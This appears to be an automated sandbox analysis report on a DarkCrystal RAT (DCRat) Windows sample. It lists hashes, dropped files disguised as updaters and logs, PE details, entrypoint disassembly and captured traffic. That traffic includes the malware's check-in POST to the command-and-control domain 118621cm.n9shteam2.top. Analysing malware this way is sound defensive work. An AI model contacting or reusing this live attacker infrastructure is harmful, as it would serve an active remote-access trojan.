                                                    SHA1:4C844C5B0EE7CB230C9C28290D079143E00CB216
                                                    SHA-256:CAF29650446DB3842E1C1E8E5E1BAFADAF90FC82C5C37B9E2C75A089B7476131
                                                    SHA-512:531D920E2567F58E8169AFC786637C1A0F7B9B5C27B27B5F0EDDBFC3E00CECD7BEA597E34061D836647C5F8C7757F2FE02952A9793344E21B39DDD4BF7985F9D
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: standlose plus.exe, Detection: malicious, Browse
                                                    • Filename: 6lmWSYhtHT.exe, Detection: malicious, Browse
                                                    • Filename: GlhUEXoa8D.exe, Detection: malicious, Browse
                                                    • Filename: 47VcV3MNuc.exe, Detection: malicious, Browse
                                                    • Filename: 8JUrnD9NeY.exe, Detection: malicious, Browse
                                                    • Filename: SL3qvfqA8t.exe, Detection: malicious, Browse
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@..:!o.:!o.:!o.3Y...!o..Jj.;!o..Jl.9!o..Jk.(!o.:!n.z!o..Jn.9!o..Jg.8!o..J..;!o..Jm.;!o.Rich:!o.........PE..d...h.6;.........."......"...*.......(.........@.....................................`....`.......... .......................................H...............p.................. ...`D..T............................@..............(A...............................text...0 .......".................. ..`.rdata..~....@.......&..............@..@.data........`.......<..............@....pdata.......p.......>..............@..@.rsrc................@..............@..@.reloc.. ............H..............@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\ms_updater.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):640512
                                                    Entropy (8bit):5.689710256126498
                                                    Encrypted:false
                                                    SSDEEP:12288:y4Tnk5JYTGS7QxJnYV7tJJMA+mEgcvJMjucBZ6:y4TnOSYYV7XJMA+byuW6
                                                    MD5:CEAC3DE237F6B1DC4B279D8E5F5B3689
                                                    SHA1:6C9C0B9031A3D136FF133B5FC72B1A1F3121E100
                                                    SHA-256:80BD7EC034AD211DC479ADCDE679F2D3EC28F478692AA84338CE057AB548E510
                                                    SHA-512:81501C9DEC1B39CFDA4FA4D8FF4573DD0BCC421272BF59955CDD7995DD8B31037FCC9D36AC9B146EE096E4687286D7590336A1F844AEB09DFA16B256BB253888
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\ms_updater.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H)_f................................. ........@.. ....................... ............@.....................................S....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...0.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                    C:\Users\user\Desktop\gOvRVAND.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Joe Sandbox View:
                                                    • Filename: Vg46FzGtNo.exe, Detection: malicious, Browse
                                                    • Filename: hZE4solQRQ.exe, Detection: malicious, Browse
                                                    • Filename: AK4VPeDc0M.exe, Detection: malicious, Browse
                                                    • Filename: 6Z4Q4bREii.exe, Detection: malicious, Browse
                                                    • Filename: a6zbacl43h.exe, Detection: malicious, Browse
                                                    • Filename: BbaXbvOA7D.exe, Detection: malicious, Browse
                                                    • Filename: cL7A9wGE3w.exe, Detection: malicious, Browse
                                                    • Filename: j05KsN2280.exe, Detection: malicious, Browse
                                                    • Filename: 2lR1Spui9w.exe, Detection: malicious, Browse
                                                    • Filename: b8khu7cOny.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                    C:\Users\user\Desktop\mHYqxgSr.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):24064
                                                    Entropy (8bit):5.4346552043530165
                                                    Encrypted:false
                                                    SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                    MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                    SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                    SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                    SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    \Device\Null

                                                    Download File
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.759057333148783
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXxX9RStbMGOZ8XKvobPKvj:Vx993DEU2tRCMGE8F7s
                                                    MD5:2E35F958FD06F112889CDF43279294AA
                                                    SHA1:73FD07F58A1007EBBF3E724D9CB13116E426CB66
                                                    SHA-256:40B3463A2FBC241489DE4B54AC91BB631580CA742E0E2D37C2FABC304CE77CFB
                                                    SHA-512:C3793964D15E5B2D66E42C72BF2092D7930C8A62EEF7E6F86A2162AF03C8606E1A7E5D0DAB3C457A5C4FBB02F8642E1C11FC89A37D12273B4028B571C53C02F8
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/07/2024 11:32:02..11:32:02, error: 0x80072746.11:32:07, error: 0x80072746.

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.813048403740222
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:1hibLFnCm1.exe
                                                    File size:906'240 bytes
                                                    MD5:2196edd4ad9d7e8ca345339a66e2fed5
                                                    SHA1:d604a25d04700d19896c1dfe12586568fae5c32f
                                                    SHA256:90a9d213bced2844dbf8a635244a85f29fa5af2c439ca7782709b1ebe304734a
                                                    SHA512:73dae769c4f6aff412d7da1241fc2259a28f1be667239a926c304f0e13bf30f1f9e0ec76e09e914afc7ef520ee2656b9cfe7ac5670be78e148571cdeedcf6fef
                                                    SSDEEP:24576:SrSvamteGeyJhlvWr6ZPk9DXlEqSdVnhU2EaPM:LvaQNJhBQXlEPhY
                                                    TLSH:CE15021038D1C472E463253708E5DB7EA97EB9201B2699EF67D80F7E8F602C1D63196B
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.S............Xr......Xr..$...Xr......Xr...............|.......|.......|......J|......J|......Rich....................PE..L..

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x40afe6
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66796FE3 [Mon Jun 24 13:08:51 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:a19e926f66227883d74cdde041d55af8

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FA52C7DDCEBh
                                                    jmp 00007FA52C7DD279h
                                                    cmp ecx, dword ptr [004390F0h]
                                                    jne 00007FA52C7DD403h
                                                    ret
                                                    jmp 00007FA52C7DE034h
                                                    call 00007FA52C7DD427h
                                                    push 00000000h
                                                    call 00007FA52C7DD6BDh
                                                    pop ecx
                                                    test al, al
                                                    je 00007FA52C7DD410h
                                                    push 0040B0A7h
                                                    call 00007FA52C7DD83Bh
                                                    pop ecx
                                                    xor eax, eax
                                                    ret
                                                    push 00000007h
                                                    call 00007FA52C7DDD72h
                                                    int3
                                                    push esi
                                                    push edi
                                                    push 00000FA0h
                                                    push 0043B564h
                                                    call dword ptr [0042A0A8h]
                                                    push 0042B2C0h
                                                    call dword ptr [0042A098h]
                                                    mov esi, eax
                                                    test esi, esi
                                                    jne 00007FA52C7DD413h
                                                    push 0042B1B0h
                                                    call dword ptr [0042A098h]
                                                    mov esi, eax
                                                    test esi, esi
                                                    je 00007FA52C7DD448h
                                                    push 0042B304h
                                                    push esi
                                                    call dword ptr [0042A09Ch]
                                                    push 0042B320h
                                                    push esi
                                                    mov edi, eax
                                                    call dword ptr [0042A09Ch]
                                                    test edi, edi
                                                    je 00007FA52C7DD414h
                                                    test eax, eax
                                                    je 00007FA52C7DD410h
                                                    mov dword ptr [0043B57Ch], edi
                                                    mov dword ptr [0043B580h], eax
                                                    pop edi
                                                    pop esi
                                                    ret
                                                    xor eax, eax
                                                    push eax
                                                    push eax
                                                    push 00000001h
                                                    push eax
                                                    call dword ptr [0042A0B4h]
                                                    mov dword ptr [0043B560h], eax
                                                    test eax, eax
                                                    jne 00007FA52C7DD3E9h
                                                    push 00000007h
                                                    call 00007FA52C7DDCF0h
                                                    int3
                                                    push 0043B564h
                                                    call dword ptr [00000000h]

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x384d80x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xdf0000x22cc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x359e00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x35a000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x359200x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x194.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x286240x28800b79b2967169a57e5028b529684b3a809False0.5810546875data6.67439707769049IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x2a0000xee500xf00024d43e26b25d45b4631cea07d7edce5aFalse0.5040852864583333data5.425027509027553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x390000x30b80x2200965d6c26d3b76e34c9475ea4d7b074f8False0.18278952205882354data4.364199987344561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .cSs0x3d0000xa10480xa120001ae398439bf4256266bb8f576d9fca0False0.9997302899534523data7.9996402860929505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc0xdf0000x22cc0x240030e9b8aec64eccd34c91b4272f38c4f5False0.7211371527777778data6.466403740176183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Imports

                                                    DLLImport
                                                    ole32.dllCoGetObjectContext, CoGetApartmentType
                                                    KERNEL32.dllSetEndOfFile, HeapSize, WaitForSingleObject, LoadLibraryW, CreateThread, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, MultiByteToWideChar, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, GetStringTypeW, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WideCharToMultiByte, CloseHandle, WaitForSingleObjectEx, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, WriteConsoleW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, ReadConsoleW, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, CreateFileW

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/03/24-15:52:06.253098TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973080192.168.2.4104.21.90.190

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 15:52:06.247704983 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:06.252676964 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:06.252785921 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:06.253098011 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:06.257894993 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:06.608555079 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:06.824548006 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:06.825920105 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:06.873346090 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:07.419704914 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.419821978 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.419992924 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:07.447504044 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:07.452497005 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.552268028 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.552495003 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:07.560182095 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.848247051 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:07.888962984 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.236958981 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.238588095 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.240210056 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.242331028 CEST8049730104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.242408991 CEST4973080192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.243484020 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.243566990 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.243691921 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.245035887 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.245106936 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.245197058 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.248446941 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.250224113 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.592111111 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.592216015 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.597208023 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.597225904 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.597285032 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.691548109 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.710963011 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.748214006 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.765732050 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.977560997 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.982760906 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:08.982836962 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.983047962 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:08.988084078 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.044270039 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.081466913 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.088802099 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.091959000 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.123503923 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.138557911 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.190867901 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.192212105 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197024107 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.197082996 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197189093 CEST8049736104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.197253942 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197371960 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.202219009 CEST8049736104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.363048077 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.363112926 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.538980007 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.539022923 CEST4973680192.168.2.4104.21.90.190

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 15:52:05.394722939 CEST5154553192.168.2.41.1.1.1
                                                    Jul 3, 2024 15:52:06.240715027 CEST53515451.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 3, 2024 15:52:05.394722939 CEST192.168.2.41.1.1.10x8edcStandard query (0)118621cm.n9shteam2.topA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 3, 2024 15:52:06.240715027 CEST1.1.1.1192.168.2.40x8edcNo error (0)118621cm.n9shteam2.top104.21.90.190A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 15:52:06.240715027 CEST1.1.1.1192.168.2.40x8edcNo error (0)118621cm.n9shteam2.top172.67.159.202A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • 118621cm.n9shteam2.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730104.21.90.190806768C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 15:52:06.253098011 CEST348OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 15:52:06.608555079 CEST344OUTData Raw: 00 02 04 04 03 0d 04 07 05 06 02 01 02 04 01 0b 00 05 05 0c 02 06 03 0c 00 54 0e 54 04 53 03 53 0a 0e 07 0f 03 04 07 04 0b 04 05 06 05 04 05 52 05 07 0f 0e 0f 07 07 52 06 03 06 0d 04 04 06 0f 05 07 0d 0b 05 04 04 55 0e 52 0c 07 0f 01 0d 02 05 50
                                                    Data Ascii: TTSSRRURPSTU\L~pvO`bqaKsQRvYwBZhc^lcExNPD|mpActc\~u~V@@z}n}\a
                                                    Jul 3, 2024 15:52:06.824548006 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 15:52:07.419704914 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr2HfW8qOsW6vGt%2BwA08C92fQKzVCPE7CAtva%2B34w%2FYv3DJ29B03aq%2Fwa044J8btHiEsgHzwGu4uoDgu0Bu8KPylY5MdASafkZU7NadNY6%2B6LnC35%2FAzWZKdEQbM5MmpOR%2BC0Dfj9RU5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75aa999ac15d7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 35 32 38 0d 0a 56 4a 7e 01 6c 6d 56 5e 6c 71 78 4b 7c 61 6b 01 7d 67 7f 42 7f 70 7a 50 7b 63 5a 42 6a 72 7f 58 60 5d 54 52 6d 5f 69 4a 61 48 60 45 7d 61 78 01 55 4b 71 40 63 71 7f 03 7d 72 61 4d 68 64 75 54 6f 66 63 55 7e 5a 63 48 61 5c 79 07 77 58 76 5d 68 58 69 5c 7f 7c 67 55 7e 01 63 01 77 76 7b 06 7c 5c 54 5b 7e 06 62 5f 7b 59 5e 05 79 74 7c 05 6f 6e 63 00 6d 5b 7c 02 6f 5d 65 5b 7f 60 7b 5a 6c 77 5e 03 7e 5c 73 4d 75 61 59 59 7a 51 41 5b 7c 77 78 0b 7c 62 65 4e 77 7f 74 4e 6c 6c 5a 02 77 5e 75 54 79 61 6e 5c 69 52 7a 04 78 72 75 59 61 60 6c 5f 62 61 73 5f 63 72 7a 50 7e 5d 7a 06 77 62 6d 05 76 66 6c 09 6b 7f 75 00 60 6f 6b 5d 7c 73 6c 49 78 6f 7f 03 7b 5e 65 5b 7c 6d 6f 51 77 67 6f 5d 69 62 54 09 7d 6e 78 50 6c 43 7e 41 7e 04 7d 4e 7b 5d 46 51 7d 6f 6c 43 7e 60 59 53 7e 77 7a 00 6f 7e 67 01 79 72 74 4b 7c 4f 5a 5f 6a 5e 7b 42 7c 70 72 53 6d 60 74 01 7d 5c 5e 46 74 5d 71 51 7b 5c 79 02 75 48 60 06 7c 66 68 4f 7d 66 53 0d 77 62 6b 49 7c 4c 75 04 7f 67 58 0b 79 76 52 0b 7e 4d 59 03 76 72 61 02 74 [TRUNCATED]
                                                    Data Ascii: 528VJ~lmV^lqxK|ak}gBpzP{cZBjrX`]TRm_iJaH`E}axUKq@cq}raMhduTofcU~ZcHa\ywXv]hXi\|gU~cwv{|\T[~b_{Y^yt|oncm[|o]e[`{Zlw^~\sMuaYYzQA[|wx|beNwtNllZw^uTyan\iRzxruYa`l_bas_crzP~]zwbmvflku`ok]|slIxo{^e[|moQwgo]ibT}nxPlC~A~}N{]FQ}olC~`YS~wzo~gyrtK|OZ_j^{B|prSm`t}\^Ft]qQ{\yuH`|fhO}fSwbkI|LugXyvR~MYvratamH|_r~l`A}IsDuO{G{ba~^y{wp{YRMxSyblzc\L^Z{Ix|rQv_V~lIdqeAvlhx||HwpT@y_}~|vzqPuMoDu_dOwOT~pftL_uu^|SwB^MtI{|UJxpTK}mttYpAbf}mQB{mT}bqNtBZC~pt~wbN{SwKybhIOk|wo~`ezsZL}bdFts[OyOeJwfhK~Xx@fuw\U|\q|gX@xHp}ssHu\ava}H_~F}|p@~gcvOUH{r_I}NaxYRywt{CwHxbt{Mv{]
                                                    Jul 3, 2024 15:52:07.419821978 CEST689INData Raw: 4e 5a 78 67 5d 5b 7c 61 64 5f 62 62 6c 04 6a 6f 67 06 7d 77 78 42 68 61 5f 0d 62 6c 5d 5d 6f 6c 52 02 63 73 6d 54 79 5f 71 47 7d 7f 66 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 59 61 5a 60 61 7e 58 75 4b 51 54 7f 52 6a 5c 60 6f 6b 58
